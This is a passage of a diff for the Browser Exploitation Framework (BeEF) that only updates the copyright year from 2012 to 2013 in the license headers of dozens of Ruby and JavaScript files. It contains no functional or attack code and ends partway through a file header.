diff --git a/core/filters/base.rb b/core/filters/base.rb
index 8b932696a..39b2a5044 100644
--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/filters/browser.rb b/core/filters/browser.rb
index af1e3932c..ca656e86b 100644
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/filters/command.rb b/core/filters/command.rb
index fbff0b977..a80abf96c 100644
--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/filters/http.rb b/core/filters/http.rb
index b34ee47d8..6a79287e3 100644
--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/filters/page.rb b/core/filters/page.rb
index 354e10877..5d63d423f 100644
--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/hbmanager.rb b/core/hbmanager.rb
index caea676de..3ea1747ce 100644
--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/loader.rb b/core/loader.rb
index 4a947536c..502a664e5 100644
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/client/are.js b/core/main/client/are.js
index fbb6e53e3..e7d781f64 100644
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/beef.js b/core/main/client/beef.js
index 41fab94a9..1bbcc01c9 100644
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index f5947fa17..f39fec33d 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/browser/cookie.js b/core/main/client/browser/cookie.js
index 8dcba9c97..9223a7f23 100644
--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/browser/popup.js b/core/main/client/browser/popup.js
index 0efd4aa8a..640386d97 100644
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index bcebc904d..9f737c8da 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/encode/base64.js b/core/main/client/encode/base64.js
index 80df54fcf..f1909c4ae 100644
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/encode/json.js b/core/main/client/encode/json.js
index 94fa8ba7a..1a9972c3e 100644
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/geolocation.js b/core/main/client/geolocation.js
index 66cc639d6..aa50adaed 100644
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index b56e30ab7..5e64e9ab2 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/init.js b/core/main/client/init.js
index 2e87606a9..992761e48 100644
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/lib/evercookie.js b/core/main/client/lib/evercookie.js
index f723f6a46..cf5609a1e 100644
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/logger.js b/core/main/client/logger.js
index 3d1217c37..f22843632 100644
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js
index 6d2229693..05b104af0 100644
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/net.js b/core/main/client/net.js
index 62c98a8ac..7b802f950 100644
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js
index 698b0301b..3da10bf36 100644
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/net/local.js b/core/main/client/net/local.js
index 545ba8105..b5e29d06c 100644
--- a/core/main/client/net/local.js
+++ b/core/main/client/net/local.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/net/portscanner.js b/core/main/client/net/portscanner.js
index caa0131eb..1241468e8 100644
--- a/core/main/client/net/portscanner.js
+++ b/core/main/client/net/portscanner.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/net/requester.js b/core/main/client/net/requester.js
index ad388282e..70e4266d3 100644
--- a/core/main/client/net/requester.js
+++ b/core/main/client/net/requester.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/os.js b/core/main/client/os.js
index f6dfae17c..eeba7ebe6 100644
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/session.js b/core/main/client/session.js
index 8dc4e6a8d..20ded71cf 100644
--- a/core/main/client/session.js
+++ b/core/main/client/session.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/timeout.js b/core/main/client/timeout.js
index 43d875f97..316f85d37 100644
--- a/core/main/client/timeout.js
+++ b/core/main/client/timeout.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/updater.js b/core/main/client/updater.js
index 912e64b16..65c5de693 100644
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js
index 796980990..393226c7d 100644
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/core/main/command.rb b/core/main/command.rb
index 3ebd42497..0a40974ae 100644
--- a/core/main/command.rb
+++ b/core/main/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/configuration.rb b/core/main/configuration.rb
index 045dd9f62..f952545ab 100644
--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb
index bdf2c72fa..71aea366e 100644
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/console/commandline.rb b/core/main/console/commandline.rb
index 7a06c52f9..30dfeb1f6 100644
--- a/core/main/console/commandline.rb
+++ b/core/main/console/commandline.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/constants/browsers.rb b/core/main/constants/browsers.rb
index e707d67e9..d7da66f6e 100644
--- a/core/main/constants/browsers.rb
+++ b/core/main/constants/browsers.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/constants/commandmodule.rb b/core/main/constants/commandmodule.rb
index ce0f6c807..559ff9d27 100644
--- a/core/main/constants/commandmodule.rb
+++ b/core/main/constants/commandmodule.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/constants/distributedengine.rb b/core/main/constants/distributedengine.rb
index 8da3eb63f..19d1edc39 100644
--- a/core/main/constants/distributedengine.rb
+++ b/core/main/constants/distributedengine.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb
index 272cf3396..f569378ee 100644
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/constants/os.rb b/core/main/constants/os.rb
index 7c932f17d..0d3dfe641 100644
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/crypto.rb b/core/main/crypto.rb
index cfce1054a..602a582c3 100644
--- a/core/main/crypto.rb
+++ b/core/main/crypto.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/distributed_engine/models/rules.rb b/core/main/distributed_engine/models/rules.rb
index ed35791d6..eef6d1e18 100644
--- a/core/main/distributed_engine/models/rules.rb
+++ b/core/main/distributed_engine/models/rules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 79c086330..bed9b43c8 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/handlers/commands.rb b/core/main/handlers/commands.rb
index 86f6e2685..aa6ba7fe5 100644
--- a/core/main/handlers/commands.rb
+++ b/core/main/handlers/commands.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/handlers/hookedbrowsers.rb b/core/main/handlers/hookedbrowsers.rb
index 0e004465a..1236decc2 100644
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index e36fedd7c..12ce8304e 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb
index 0df1cbdc9..e911f33fc 100644
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -52,7 +52,7 @@ module BeEF
             if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
               #content = command_module.output.gsub('//
               #//
-              #//   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              #//   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
               #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
               #//   See the file 'doc/COPYING' for copying permission
               #//
diff --git a/core/main/logger.rb b/core/main/logger.rb
index 5486be58c..e907aa05d 100644
--- a/core/main/logger.rb
+++ b/core/main/logger.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/migration.rb b/core/main/migration.rb
index 973ea0229..2b210e687 100644
--- a/core/main/migration.rb
+++ b/core/main/migration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb
index 020da0e06..9e72844ed 100644
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/models/command.rb b/core/main/models/command.rb
index bc408b22f..352e57adb 100644
--- a/core/main/models/command.rb
+++ b/core/main/models/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/models/commandmodule.rb b/core/main/models/commandmodule.rb
index 11100aaa4..5bc06afd8 100644
--- a/core/main/models/commandmodule.rb
+++ b/core/main/models/commandmodule.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/models/hookedbrowser.rb b/core/main/models/hookedbrowser.rb
index 13c011e04..f8d186f5e 100644
--- a/core/main/models/hookedbrowser.rb
+++ b/core/main/models/hookedbrowser.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/models/log.rb b/core/main/models/log.rb
index 3e78c0c7f..f1b9e237f 100644
--- a/core/main/models/log.rb
+++ b/core/main/models/log.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/models/optioncache.rb b/core/main/models/optioncache.rb
index 9dedec1d1..379ce60ad 100644
--- a/core/main/models/optioncache.rb
+++ b/core/main/models/optioncache.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/models/result.rb b/core/main/models/result.rb
index 50e20ed1b..c332e22bf 100644
--- a/core/main/models/result.rb
+++ b/core/main/models/result.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/models/user.rb b/core/main/models/user.rb
index 6b5947bad..45f579ebc 100644
--- a/core/main/models/user.rb
+++ b/core/main/models/user.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/network_stack/api.rb b/core/main/network_stack/api.rb
index 1e7c5bae2..1592df9d9 100644
--- a/core/main/network_stack/api.rb
+++ b/core/main/network_stack/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/network_stack/assethandler.rb b/core/main/network_stack/assethandler.rb
index c17c0689c..48667fdd1 100644
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/network_stack/handlers/dynamicreconstruction.rb b/core/main/network_stack/handlers/dynamicreconstruction.rb
index 276b63780..4825682dd 100644
--- a/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/network_stack/websocket/websocket.rb b/core/main/network_stack/websocket/websocket.rb
index a9274f5b5..eff0de1b8 100644
--- a/core/main/network_stack/websocket/websocket.rb
+++ b/core/main/network_stack/websocket/websocket.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/rest/api.rb b/core/main/rest/api.rb
index 9171b2c76..12a26614c 100644
--- a/core/main/rest/api.rb
+++ b/core/main/rest/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/rest/handlers/admin.rb b/core/main/rest/handlers/admin.rb
index 6730f2d9e..f5ebc0efd 100644
--- a/core/main/rest/handlers/admin.rb
+++ b/core/main/rest/handlers/admin.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/rest/handlers/categories.rb b/core/main/rest/handlers/categories.rb
index 88d5e8302..cb97c065e 100644
--- a/core/main/rest/handlers/categories.rb
+++ b/core/main/rest/handlers/categories.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/rest/handlers/hookedbrowsers.rb b/core/main/rest/handlers/hookedbrowsers.rb
index f3384a6ca..d465c5031 100644
--- a/core/main/rest/handlers/hookedbrowsers.rb
